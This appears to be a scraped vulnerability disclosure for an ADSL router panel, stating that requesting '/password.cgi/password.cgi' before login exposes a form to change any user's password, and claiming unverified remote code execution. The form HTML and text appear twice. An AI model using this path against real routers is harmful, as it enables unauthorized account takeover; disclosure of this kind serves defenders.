VULHUB ™

### Description Any user can edit all users password and execute remote code directly without have access ### Proof of Concept request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi ``` <form> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td width="120">Username:</td> <td><select name='userName' size="1"> <option value="0"> <option value="1">root <!-- admin --> <option value="2">support <!-- support --> <option value="3">user <!-- user --> </select></td> </tr> <tr> <td>Old Password:</td> <td><input name='pwdOld' type="password" size="20" maxlength="16"></td> </tr> <tr> <td>New Password:</td> <td><input name='pwdNew' type="password" size="20" maxlength="16"></td> </tr> <tr> <td>Confirm Password:</td> <td><input name='pwdCfm' type='password' size="20" maxlength="16"></td> </tr> </table> <br> <center><input type='button' onClick='btnApply()' value='Save/Apply'></center> </form> ```

### Description Any user can edit all users password and execute remote code directly without have access ### Proof of Concept request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi ``` <form> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td width="120">Username:</td> <td><select name='userName' size="1"> <option value="0"> <option value="1">root <!-- admin --> <option value="2">support <!-- support --> <option value="3">user <!-- user --> </select></td> </tr> <tr> <td>Old Password:</td> <td><input name='pwdOld' type="password" size="20" maxlength="16"></td> </tr> <tr> <td>New Password:</td> <td><input name='pwdNew' type="password" size="20" maxlength="16"></td> </tr> <tr> <td>Confirm Password:</td> <td><input name='pwdCfm' type='password' size="20" maxlength="16"></td> </tr> </table> <br> <center><input type='button' onClick='btnApply()' value='Save/Apply'></center> </form> ```